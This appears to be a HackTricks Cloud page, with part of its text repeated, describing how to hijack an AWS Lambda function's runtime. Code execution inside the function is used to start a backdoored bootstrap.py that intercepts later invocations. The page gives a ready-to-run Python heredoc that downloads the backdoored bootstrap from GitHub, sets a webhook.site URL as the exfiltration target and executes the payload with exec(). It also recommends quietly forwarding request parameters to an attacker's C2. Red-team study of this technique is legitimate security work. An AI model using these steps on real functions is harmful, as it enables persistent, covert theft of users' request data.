AWS - Steal Lambda Requests

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Lambda Flow

Slicer is a process outside the container that send invocations to the init process.
The init process listens on port 9001 exposing some interesting endpoints:
- /2018-06-01/runtime/invocation/next – get the next invocation event
- /2018-06-01/runtime/invocation/{invoke-id}/response – return the handler response for the invoke
- /2018-06-01/runtime/invocation/{invoke-id}/error – return an execution error
bootstrap.py has a loop getting invocations from the init process and calls the users code to handle them (/next).
Finally, bootstrap.py sends to init the response

Note that bootstrap loads the user code as a module, so any code execution performed by the users code is actually happening in this process.

Stealing Lambda Requests

The goal of this attack is to make the users code execute a malicious bootstrap.py process inside the bootstrap.py process that handle the vulnerable request. This way, the malicious bootstrap process will start talking with the init process to handle the requests while the legit bootstrap is trapped running the malicious one, so it won't ask for requests to the init process.

This is a simple task to achieve as the code of the user is being executed by the legit bootstrap.py process. So the attacker could:

Send a fake result of the current invocation to the init process, so init thinks the bootstrap process is waiting for more invocations.
- A request must be sent to /${invoke-id}/response
- The invoke-id can be obtained from the stack of the legit bootstrap.py process using the inspect python module (as proposed here) or just requesting it again to /2018-06-01/runtime/invocation/next (as proposed here).
Execute a malicious boostrap.py which will handle the next invocations
- For stealthiness purposes it's possible to send the lambda invocations parameters to an attackers controlled C2 and then handle the requests as usual.
- For this attack, it's enough to get the original code of bootstrap.py from the system or github, add the malicious code and run it from the current lambda invocation.

Attack Steps

Find a RCE vulnerability.
Generate a malicious bootstrap (e.g. https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py)
Execute the malicious bootstrap.

You can easily perform these actions running:

python3 <<EOF
import os
import urllib3

# Download backdoored bootstrap
http = urllib3.PoolManager()
backdoored_bootstrap_url = "https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py"
new_runtime = http.request('GET', backdoored_bootstrap_url).data

# Load new bootstrap
os.environ['URL_EXFIL'] = "https://webhook.site/c7036f43-ce42-442f-99a6-8ab21402a7c0"

exec(new_runtime)
EOF

For more info check https://github.com/carlospolop/lambda_bootstrap_switcher

References

https://unit42.paloaltonetworks.com/gaining-persistency-vulnerable-lambdas/

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - Lambda Post Exploitation NextAWS - Lightsail Post Exploitation

Last updated 4 months ago

Lambda Flow

Slicer is a process outside the container that send invocations to the init process.

The init process listens on port 9001 exposing some interesting endpoints:

/2018-06-01/runtime/invocation/next – get the next invocation event
/2018-06-01/runtime/invocation/{invoke-id}/response – return the handler response for the invoke
/2018-06-01/runtime/invocation/{invoke-id}/error – return an execution error

bootstrap.py has a loop getting invocations from the init process and calls the users code to handle them (/next).

Finally, bootstrap.py sends to init the response

Note that bootstrap loads the user code as a module, so any code execution performed by the users code is actually happening in this process.

Stealing Lambda Requests

This is a simple task to achieve as the code of the user is being executed by the legit bootstrap.py process. So the attacker could:

Send a fake result of the current invocation to the init process, so init thinks the bootstrap process is waiting for more invocations.

A request must be sent to /${invoke-id}/response
The invoke-id can be obtained from the stack of the legit bootstrap.py process using the inspect python module (as proposed here) or just requesting it again to /2018-06-01/runtime/invocation/next (as proposed here).

Execute a malicious boostrap.py which will handle the next invocations

For stealthiness purposes it's possible to send the lambda invocations parameters to an attackers controlled C2 and then handle the requests as usual.
For this attack, it's enough to get the original code of bootstrap.py from the system or github, add the malicious code and run it from the current lambda invocation.

Attack Steps

You can easily perform these actions running:

python3 <<EOF
import os
import urllib3

# Download backdoored bootstrap
http = urllib3.PoolManager()
backdoored_bootstrap_url = "https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py"
new_runtime = http.request('GET', backdoored_bootstrap_url).data

# Load new bootstrap
os.environ['URL_EXFIL'] = "https://webhook.site/c7036f43-ce42-442f-99a6-8ab21402a7c0"

exec(new_runtime)
EOF